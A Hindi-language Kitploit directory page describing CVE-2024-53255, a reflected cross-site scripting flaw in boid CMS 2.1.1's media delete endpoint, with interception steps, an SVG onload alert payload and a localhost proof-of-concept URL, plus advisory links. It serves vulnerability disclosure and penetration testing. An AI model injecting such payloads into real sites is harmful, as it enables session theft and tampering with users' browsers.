Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-53255 — boid CMS 2.1.1 - परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) | Kitploit
उपकरण/GitHubGitHub/0x4m3r/cve-2024-53255
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub0x4m3r/cve-2024-53255

CVE-2024-53255

boid CMS 2.1.1 - परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS)

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-53255

boid CMS 2.1.1 - प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग (XSS)

विवरण:

/admin?page=media एंडपॉइंट के file पैरामीटर में एक प्रतिबिंबित XSS भेद्यता मौजूद है, जो हमलावर को मनमाना JavaScript कोड इंजेक्ट करने की अनुमति देती है।

शोषण के चरण:

1- CMS में लॉगिन करें और डिलीट पेज (/admin?page=media) पर जाएं।

2- डिलीट करने के लिए कोई भी फ़ाइल चुनें और प्रॉक्सी टूल का उपयोग करके अनुरोध को इंटरसेप्ट करें।

3- इंटरसेप्ट किए गए अनुरोध में file पैरामीटर को निम्नलिखित में बदलें:

root@kitploit:~
<svg+onload%3dalert(document.domain)>

4 - संशोधित अनुरोध को आगे बढ़ाएं और इंजेक्ट की गई स्क्रिप्ट निष्पादित हो जाएगी।

प्रूफ ऑफ कॉन्सेप्ट (PoC):

root@kitploit:~
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4

अधिक जानकारी के लिए: https://nvd.nist.gov/vuln/detail/CVE-2024-53255 https://www.cve.org/CVERecord?id=CVE-2024-53255 https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7 https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r

टूल डाउनलोड करें